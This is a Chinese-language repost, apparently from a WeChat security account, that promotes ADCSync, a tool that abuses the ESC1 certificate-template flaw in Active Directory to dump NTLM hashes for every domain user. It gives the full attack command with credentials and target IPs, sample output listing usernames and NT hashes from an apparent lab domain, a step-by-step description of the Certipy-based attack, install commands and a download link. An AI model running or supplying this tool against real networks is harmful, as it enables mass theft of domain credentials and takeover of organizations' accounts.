这是利用 ESC1 快速组合而成的 DCSync 工具。是一种在不使用DRSUAPI或卷影复制的情况下执行临时 DCSync 攻击的有效方法。
python3 adcsync.py -u clu -p theperfectsystem -ca THEGRID-KFLYNN-DC-CA -template SmartCard -target-ip 192.168.0.98 -dc-ip 192.168.0.98 -f users.json -o ntlm_dump.txt___ ____ ___________/ | / __ / ____/ ___/__ ______ _____/ /| | / / / / / __ / / / / __ / ___// ___ |/ /_/ / /___ ___/ / /_/ / / / / /__/_/ |_/_____/____//____/__, /_/ /_/___//____/Grabbing user certs:100%|████████████████████████████████████████████████████████████████████████████████████████████████████████████████████████| 105/105 [02:18<00:00, 1.32s/it]THEGRID.LOCAL/shirlee.saraann::aad3b435b51404eeaad3b435b51404ee:68832255545152d843216ed7bbb2d09e:::THEGRID.LOCAL/rosanne.nert::aad3b435b51404eeaad3b435b51404ee:a20821df366981f7110c07c7708f7ed2:::THEGRID.LOCAL/edita.lauree::aad3b435b51404eeaad3b435b51404ee:b212294e06a0757547d66b78bb632d69:::THEGRID.LOCAL/carol.elianore::aad3b435b51404eeaad3b435b51404ee:ed4603ce5a1c86b977dc049a77d2cc6f:::THEGRID.LOCAL/astrid.lotte::aad3b435b51404eeaad3b435b51404ee:201789a1986f2a2894f7ac726ea12a0b:::THEGRID.LOCAL/louise.hedvig::aad3b435b51404eeaad3b435b51404ee:edc599314b95cf5635eb132a1cb5f04d:::THEGRID.LOCAL/janelle.jess::aad3b435b51404eeaad3b435b51404ee:a7a1d8ae1867bb60d23e0b88342a6fab:::THEGRID.LOCAL/marie-ann.kayle::aad3b435b51404eeaad3b435b51404ee:a55d86c4b2c2b2ae526a14e7e2cd259f:::THEGRID.LOCAL/jeanie.isa::aad3b435b51404eeaad3b435b51404ee:61f8c2bf0dc57933a578aa2bc835f2e5:::
介绍
ADCSync 使用 ESC1 漏洞从 Active Directory 环境中的用户帐户转储 NTLM 哈希值。该工具将首先抓取传入的 Bloodhound 转储文件中的每个用户和域。然后它将使用 Certipy 为每个用户发出请求并将其 PFX 文件存储在证书目录中。最后,它将使用 Certipy 通过证书进行身份验证并检索每个用户的 NT 哈希值。此过程非常慢,可能需要一段时间才能完成,但提供了另一种转储 NTLM 哈希值的方法。
git clone https://github.com/JPG0mez/adcsync.gitcd adcsyncpip3 install -r requirements.txt
用法
要使用这个工具,我们需要以下东西:
-
有效的域凭据
-
将传入的来自 Bloodhound 转储的用户列表。
-
容易受到 ESC1 攻击的模板(使用 Certipy find 发现)
下载地址:
https://pan.quark.cn/s/a08f566d9933
原文始发于微信公众号(TtTeam):Dump Hash 新方法 - ADCSync
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论